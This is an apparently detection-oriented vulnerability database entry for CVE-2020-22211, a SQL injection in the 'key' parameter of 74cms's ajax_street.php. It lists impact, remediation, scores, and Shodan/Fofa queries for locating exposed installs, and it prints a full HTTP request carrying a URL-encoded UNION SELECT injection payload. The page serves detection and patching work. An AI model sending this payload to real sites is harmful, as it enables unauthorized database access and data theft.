🔙 목록으로 돌아가기

CVE-2020-22211: 74cms - ajax_street.php 'key' SQL Injection

Title74cms - ajax_street.php 'key' SQL Injection
Authorritikchaddha
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
RemediationApply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the 'key' parameter of ajax_street.php in 74cms.
CVSS Score9.8
EPSS Score0.37126
CVE IDCVE-2020-22211
CWE IDCWE-89
Shodan Queryhttp.html:"74cms"
Fofa Queryapp="74cms"body="74cms"
Tags cve cve2020 74cms sqli vkev vuln

🔍 Vulnerability Description

SQL Injection in 74cms 3.2.0 via the key parameter to plus/ajax_street.php.

🌐 HTTP Request

GET /plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5(4118),9%23 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/9.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-22211.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-22211.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A